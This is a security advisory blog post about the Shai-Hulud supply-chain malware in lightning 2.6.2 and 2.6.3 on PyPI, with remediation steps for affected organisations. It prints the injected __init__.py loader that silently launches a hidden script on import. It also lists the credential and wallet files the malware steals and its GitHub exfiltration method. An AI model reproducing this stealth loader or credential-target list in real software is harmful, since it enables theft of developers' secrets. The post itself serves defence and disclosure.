Shai-Hulud Malware Worms Its Way Into PyTorch Lightning — AI Developers' Credentials at Risk

The Shai-Hulud malware campaign — named after the sandworms of Dune — has crawled from npm into Python territory. Versions 2.6.2 and 2.6.3 of the lightning package on PyPI, the widely-used framework for training PyTorch models, contain malicious code that silently steals developer credentials, cloud secrets, and cryptocurrency wallets.

If you’re using either of those versions, treat your machine as compromised. This isn’t a theoretical risk. It’s a very real, very thorough data theft operation that’s been running inside one of the most popular machine learning frameworks on the planet.

How It Works

The attack is surgical. Malicious code injected into __init__.py — the file that runs the moment you import the package — spawns a background thread before any legitimate Lightning code loads:

def _run_runtime() -> None:
    _runtime_dir = os.path.join(os.path.dirname(__file__), "_runtime")
    _start = os.path.join(_runtime_dir, "start.py")
    if os.path.exists(_start):
        subprocess.Popen(
            [sys.executable, _start],
            cwd=_runtime_dir,
            stdout=subprocess.DEVNULL,
            stderr=subprocess.DEVNULL,
        )

threading.Thread(target=_run_runtime, daemon=True).start()

The start.py bootstrapper then downloads the Bun JavaScript runtime (v1.3.13) and executes an 11MB payload called router_runtime.js. This is the same pattern used in the Bitwarden CLI and SAP npm compromises earlier in the campaign — same attacker, same worm, now crossing from npm to PyPI.

What It Steals

This is where it gets genuinely alarming. The malware doesn’t just grab API keys — it hoovers up everything:

SSH keys and shell histories (bash, zsh, Python, Node, MySQL, psql)
Environment files (.env) — the universal config format that holds everything
Git credentials
Cloud credentials — AWS, GCP, Azure
Kubernetes and Helm configs
Docker credentials
npm tokens
MCP configs (Model Context Protocol — used by AI coding assistants like Cursor and Claude Code)
Cryptocurrency wallets — Bitcoin, Litecoin, Monero, Dogecoin, Dash, Exodus, Atomic, and Ledger
VPN credentials — NordVPN, ProtonVPN, CyberGhost, Windscribe, OpenVPN
Discord and Slack session data

All stolen data is RSA-2048 encrypted before exfiltration to public GitHub repositories, making it harder to detect and intercept.

The inclusion of MCP configs is particularly notable. If you’re using an AI coding assistant like Cursor or Claude Code, the malware grabs the configuration files that tell those tools which servers you trust and what permissions you’ve granted. That’s not opportunistic — that’s targeting the AI development workflow specifically.

A Campaign, Not an Incident

This is the third confirmed attack in the Shai-Hulud campaign:

Bitwarden CLI npm package (April 23) — password manager compromised
SAP npm packages (April 29) — enterprise software supply chain
PyTorch Lightning PyPI package (April 30) — AI training framework

The attacker is methodically targeting high-value, widely-installed packages in the developer ecosystem. Each attack uses the same infrastructure: a Bun-based bootstrapper that downloads the payload from GitHub. Each attack steals broadly and encrypts before exfiltration.

This isn’t a proof of concept. This is operational malware that’s been running in production environments.

Why It Matters for NZ

PyTorch Lightning is used by AI researchers, startups, and enterprises worldwide — including in New Zealand. Any NZ organisation running machine learning workloads that pulled lightning==2.6.2 or 2.6.3 between when those versions were published and when they were pulled is potentially affected.

This includes:

University research groups training models on local HPC clusters
AI startups building products on PyTorch
Enterprise data science teams running training pipelines
Cloud workloads on AWS, GCP, or Azure where credentials could have been exfiltrated

The NZ-specific concern isn’t just the malware itself — it’s the follow-on risk. Stolen cloud credentials can be used to spin up cryptocurrency mining operations, access sensitive data, or pivot into other parts of an organisation’s infrastructure. If your AWS credentials were in an .env file on a machine that imported the compromised Lightning versions, you should assume they’re compromised regardless of whether you’ve found evidence of unauthorised access.

What to Do

Immediate actions:

Check your dependencies: pip show lightning — if you see version 2.6.2 or 2.6.3, assume the machine is compromised
Pin to safe versions: pip install lightning==2.6.1 or earlier
Rotate ALL credentials that were on the affected machine — SSH keys, cloud API keys, database passwords, npm tokens, everything
Check GitHub for any repositories you don’t recognise that might be receiving exfiltrated data
Review access logs for cloud accounts for any unauthorised activity

Longer term:

Use dependency pinning and hash verification in your CI/CD pipelines
Consider tools like Aikido’s Safe Chain that intercept package installs and check them against threat intel before installation
Audit your supply chain regularly — this attack was caught by security researchers, not by the package maintainers

The Bigger Problem

The Shai-Hulud campaign is exploiting a fundamental weakness in how modern software is built. Open source packages are maintained by volunteers and small teams. Package registries like PyPI and npm have limited resources for vetting. And the development ecosystem has made it normal to install hundreds of dependencies you’ve never audited.

PyTorch Lightning has over 10,000 GitHub stars and is used by thousands of organisations. It’s not some obscure package. If this can happen to Lightning, it can happen to anything.

The AI ecosystem is particularly vulnerable because it sits at the intersection of cutting-edge research and startup-speed development. Researchers and engineers are installing packages quickly, iterating fast, and not always checking what they’re pulling in. The Shai-Hulud attacker understands this — that’s why they’re targeting AI tools specifically.

The sandworm is in the spice. Time to check your dependencies.